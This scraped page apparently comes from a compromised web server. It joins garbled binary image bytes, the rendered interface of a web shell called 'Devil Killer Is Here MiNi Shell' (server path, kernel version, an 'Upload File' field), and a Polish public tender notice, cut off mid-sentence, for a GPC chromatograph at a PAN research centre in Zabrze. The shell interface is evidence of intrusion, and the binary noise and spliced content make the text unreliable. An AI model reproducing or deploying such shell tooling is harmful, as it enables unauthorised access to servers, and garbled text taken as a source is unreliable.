JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20241108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20241108/0058592801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> DOSTAWA CHROMATOGRAFU GPC - ZESTAW DLA CENTRUM MATERIAŁÓW POLIMEROWYCH I WĘGLOWYCH PAN W ZABRZU, UL. MARII CURIE-SKŁODOWSKIEJ 34 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRUM MATERIAŁÓW POLIMEROWYCH I WĘGLOWYCH POLSKIEJ AKADEMII NAUK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000564665</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Marii Curie-Skłodowskiej 34</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zabrze</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-819</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48322716077</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@cmpw-pan.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.cmpw-pan.edu.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - Polska Akademia Nauk i tworzone przez nią jednostki organizacyjne</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> BADANIA NAUKOWE I PRACE ROZWOJOWE W DZIEDZINIE POZOSTAŁYCH NAUK PRZYRODNICZYCH I TECHNICZNYCH </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> DOSTAWA CHROMATOGRAFU GPC - ZESTAW DLA CENTRUM MATERIAŁÓW POLIMEROWYCH I WĘGLOWYCH PAN W ZABRZU, UL. MARII CURIE-SKŁODOWSKIEJ 34 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a12d3581-881f-4f17-9650-4301b46c3074</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00585928</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00076509/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 DOSTAWA CHROMATOGRAFU ŻELOWEGO GPC</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-a12d3581-881f-4f17-9650-4301b46c3074 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w niniejszym<br/>postępowaniu o udzielenie zamówienia (w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń)<br/>między Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, tj. przy użyciu Platformy e-<br/>Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>Osobą ze strony Zamawiającego do komunikowania się z Wykonawcami jest Pani Iwona Kurnicka e-mail: ikurnicka@cmpw-pan.pl<br/>W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej (nie dotyczy czynności złożenia,<br/>wycofania lub zmiany oferty). Adres skrzynki e-mail Zamawiającego: ikurnicka@cmpw-pan.pl<br/>Wykonawcy zamierzający wziąć udział w postępowaniu o udzielenie<br/>zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na<br/>temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin korzystania z<br/>Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce<br/>„Centrum Pomocy”.<br/>Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu +48 22 458 77 99 lub drogą elektroniczną poprzez<br/>formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem danych osobowych jest Centrum Materiałów Polimerowych i Węglowych Instytut Polskiej Akademii Nauk, ul. Marii Curie-Skłodowskiej 34, 41-819 Zabrze. <br/>2. Z Inspektorem Ochrony Danych skontaktować się można tradycyjnie, pisząc na adres naszej siedziby, mailowo iod@cmpw-pan.edu.pl lub telefonicznie 32 2716077. <br/>3. Dane są zbierane w celu przeprowadzenia czynności zmierzających do udzielenia zamówienia oraz zawarcia i realizacji umowy, w związku z koniecznością przestrzegania zasady wynikającej z przepisów ustawy o finansach publicznych, tj. w celu dokonywania wydatków w sposób celowy i oszczędny z zachowaniem uzyskiwania najlepszych efektów z danych nakładów. Podstawą prawną działania jest art. 6 ust. 1 lit. c) RODO. <br/>4. Dane osobowe są przetwarzane w zakresie, w jakim zostały udostępnione. <br/>5. Dane osobowe będą przechowywane przez okres: <br/>Realizując obowiązki związane z przetwarzaniem Państwa danych osobowych w rozumieniu Rozporządzenia Parlamentu Europejskiego i Rady Unii Europejskiej 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (dalej: RODO) informujemy, że: <br/>- niezbędny do realizacji umowy, <br/>- do momentu przedawnienia roszczeń mogących wyniknąć z umowy, <br/>- określony w przepisach prawa; <br/>6. Dane osobowe mogą być udostępnione innym podmiotom, jeżeli obowiązek taki będzie wynikał z umowy lub przepisów prawa. <br/>7. W związku z przetwarzaniem danych osobowych osobie, której dane dotyczą przysługuje prawo dostępu do nich, ich poprawiania, ograniczenia przetwarzania, a także prawo do złożenia skargi do organu nadzorczego. <br/>8. Podanie danych jest wymogiem wynikającym z przepisów prawa, a ich nie podanie skutkuje brakiem możliwości wzięcia udziału w postępowaniu. <br/>9. Administrator danych osobowych podejmie starania, aby dane osobowe ochronić przed ich przypadkowym czy umyślnym zniszczeniem, przypadkową utratą, zmianą, nieuprawnionym ujawnieniem, wykorzystaniem czy dostępem.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub<br/>prawnej lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TP1/03/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> &#34;Chromatograf powinien być wyposażony w następujące elementy:<br/><br/>1.Detektor refraktometryczny – 1 szt.<br/>•	zakres załamania światła 1,0-1,75<br/>•	zakres pomiarowy: ±600 μRIU<br/>•	maksymalny przepływ: do min. 10 ml/min<br/>•	termostatowanie w zakresie co najmniej 30 – 55°C<br/>•	szum: ≤2,5 nRIU <br/>•	Zakres liniowości do 600 μRIU<br/>2.Detektor UV-VIS – 1 szt<br/>•	zakres długości fali: 190 – 900 nm<br/>•	możliwość równoczesnego pomiaru przy minimum trzech długościach fali<br/>•	częstotliwość zbierania danych minimum 150 Hz<br/>•	dokładność ustawienia długości fali – ±1 nm<br/>•	dryft sygnału: ≤ 1 x 10־4 AU/h przy 254 nm<br/>•	szum sygnału: ≤ ±3.0 x 10-6 AU przy 254 nm<br/>•	liniowość detektora do 2.5AU<br/>•	automatyczna kalibracja i weryfikacja za pomocą wbudowanych filtrów referencyjnych.<br/>celka: droga optyczna 10mm, objętość celki maksymalnie 11µl<br/>3.Pompa izokratyczna, dwutłokowa – 1 szt.<br/>•	Kontrolowana szybkość przepływu eluentu: w zakresie min. 0,001 do 10 ml/min z krokiem 0,001 ml/min,<br/>•	Zakres ciśnień roboczych: do min. 700 bar w zakresie przepływu do co najmniej 5 ml/min<br/>•	Dokładność przepływu – równa lub lepsza niż ±0,1%<br/>•	Precyzja przepływu &lt; 0,05%RSD<br/>•	Pełna kontrola z poziomu oprogramowania<br/>•	Wbudowane funkcje walidacyjne<br/>Automatyczne przemywanie tłoków w standardzie<br/>4.Autosampler – 1 szt.:<br/>•	Cykl nastrzyku autosamplera do 10 s.<br/>•	Zakres ciśnień roboczych do min. 700 bar<br/>•	zakres objętości nastrzykiwanej próbki od 0,1 µl do 100 µl bez zmiany pętli<br/>•	Metoda nastrzyku wykonywana w trybie tzw. prekompresji próbki<br/>•	pojemnik na min. 200 fiolek o obj. 1,5-1,8 ml<br/>•	automatyczne rozpoznanie rodzaju zastosowanej tacy (czytnik „barcode”)<br/>•	termostatowana komora próbek w zakresie min. +4°C do +40 °C<br/>•	precyzja nastrzyku nie gorsza niż 0,25% RSD dla nastrzyku 3 µl<br/>•	możliwość wielokrotnego powtórzenia nastrzyku z jednej fiolki<br/>carryover: &lt;0,002%<br/>5.Termostat do kolumn – 2 szt.:<br/>•	Termostat do kolumn na min. 2 kolumny o długości do 30 cm<br/>•	Termostatowanie kolumn w zakresie min. +5°C do +85°C,<br/>•	Możliwość wyboru trybu termostatowania: obieg powietrza wymuszony lub bierny<br/>•	Stabilność temperatury: nie gorsza niż ± 0,05°C,<br/>•	Dokładność temperatury: nie gorsza niż ± 0,5°C,<br/>Moduł wstępnego podgrzewania fazy ruchomej przed wejściem na kolumnę<br/>6.Zawór automatyczny do przełączania pomiędzy dwiema kolumnami, sterowany z poziomu oprogramowania – 1 szt.<br/>7.Oprogramowanie<br/>•	Oprogramowanie chromatograficzne do sterowania pracą, zbierania, analizy, przechowywania i przetwarzania danych GPC/SEC<br/>•	Możliwość eksportu danych do programów Microsoft Acces i Excel<br/>•	Możliwość tworzenia własnych raportów<br/>•	Pracujące pod systemem operacyjnym Microsoft Windows 11<br/>•	Opcja oprogramowania do obliczeń GPC<br/>-	Wykres dystrybucji masy cząsteczkowej<br/>-	Skumulowany wykres rozkładu masy cząsteczkowej<br/>-	Średnie masy cząsteczkowe (Mn, Mw, Mz, Mz+1)<br/>-	Polidyspersyjność<br/>•	Architektura klient-serwer<br/>•	Kontrola wszystkich modułów chromatografu<br/>•	Wbudowana baza danych<br/>Wbudowane procedury kwalifikacji IQ, OQ/PQ<br/>Jednostka sterująca o parametrach zalecanych przez producenta oferowanej aparatury<br/>8.Zestaw instalacyjny z niezbędnymi połączeniami i narzędziami<br/>9.Dodatkowe wymagania <br/>•	zestaw 2 kolumn GPC/SEC typu „mixed bed” z kolumnami ochronnymi i odpowiednimi uchwytami (jeśli są wymagane)<br/>•	Gwarancja co najmniej 12 miesięcy<br/>•	Oferowana aparatura musi być fabrycznie nowa <br/>Instrukcja obsługi w języku polskim, obejmująca zasadnicze informacje niezbędne dla prawidłowego użytkowania i obsługi przez użytkownika<br/>Odgazowanie eluentu – 1 szt.<br/>2-kanałowy system odgazowania próżniowego wraz z butelkami i podłączeniami<br/>10.Ponadto:<br/>Serwis gwarancyjny świadczony przez firmę dostawczą, uruchomienie i przeszkolenie w zakresie obsługi i eksploatacji nabytej aparatury min. 2 dni.&#34; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">38432200-4 - Chromatografy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert<br/>Lp.	Kryterium	Znacznie procentowe kryterium (waga)	Maksymalna liczba punktów jakie może otrzymać oferta <br/>1. Cena (C)	80%	80 punktów<br/>2.	Termin realizacji zamówienia (T)	20% 20 punktów<br/><br/>2. Zasady oceny kryterium „Cena” (C).<br/>W przypadku kryterium „Cena” oferta otrzyma zaokrągloną do dwóch miejsc po przecinku liczbę punktów wynikającą z działania:<br/> C min<br/>Pi (C) = ------------- x 80<br/> Ci<br/>gdzie:<br/>Pi (C) - liczba punktów jakie otrzyma oferta „i&#34; za kryterium &#34;Cena&#34;<br/>C min - najniższa cena brutto spośród wszystkich ważnych i nieodrzuconych ofert<br/>Ci - cena brutto oferty „i&#34;<br/>3. Zasady oceny kryterium „Termin realizacji zamówienia” ( T ).<br/>Zamawiający przyzna w kryterium „Termin realizacji zamówienia” punktację na podstawie<br/>zadeklarowanego w Formularzu ofertowym terminu realizacji przedmiotu zamówienia, przy czym<br/>maksymalny termin realizacji zamówienia to 60 dni kalendarzowych od dnia<br/>podpisania umowy z Wykonawcą. Punktacja zostanie przyznana w następujący sposób:<br/>1) Realizacja zamówienia (dostawa i odbiór) powyżej 45 dni kalendarzowych od dnia podpisania umowy z wybranym Wykonawcą, jednak nie dłużej niż 60 dni kalendarzowych(włącznie) – 0 pkt.<br/>2) Realizacja zamówienia (dostawa i odbiór) powyżej 30 dni kalendarzowych od dnia podpisania umowy z wybranym Wykonawcą, jednak nie dłużej niż 45 dni kalendarzowych(włącznie) – 10 pkt.<br/>3) Realizacja zamówienia (dostawa i odbiór) do 30 dni kalendarzowych (włącznie) od dnia podpisania umowy z wybranym Wykonawcą – 20 pkt.<br/> <br/>4. Ostateczna punktacja danej oferty zostanie ustalona zgodnie ze wzorem:<br/>Pi = Pi (C) + Pi (T)<br/>gdzie:<br/>Pi Łączna liczba punktów przyznana ofercie „i”<br/>Pi (C) liczba punktów jakie otrzyma oferta „i&#34; za kryterium &#34;Cena&#34;<br/>Pi (T) liczba punktów jakie otrzyma oferta „i&#34; za kryterium „Termin realizacji zamówienia”<br/>6. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>7. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną.<br/>8. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w pkt 5, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie o niepodleganiu wykluczeniu potwierdzające brak podstaw wykluczenia na dzień składania ofert w zakresie art. 108<br/>ust. 1 oraz art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dopuszcza się możliwość dokonania zmiany umowy w następujących okolicznościach:<br/>	nastąpiła zmiana danych podmiotów zawierających umowę ( np. dane rejestrowe),<br/>	uległa zmianie nazwa handlowa produktu, numer katalogowy, o ile zmiany te zostały dokonane przez producenta i potwierdzone stosownym dokumentem,<br/>	uległa zmianie stawka podatku VAT,<br/>	wycofano produkt z rynku, w tym przypadku produkt zostanie zastąpiony produktem równoważnym przy zastosowaniu ceny nie wyższej niż w umowie,<br/>	zaprzestano produkcji, w tym przypadku produkt zostanie zastąpiony produktem równoważnym przy zastosowaniu ceny nie wyższej niż w umowie,<br/>	konieczności zmiany miejsca dostawy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Poprzez platformę ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-19 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający poinformuje wykonawcę, któremu zostanie udzielone 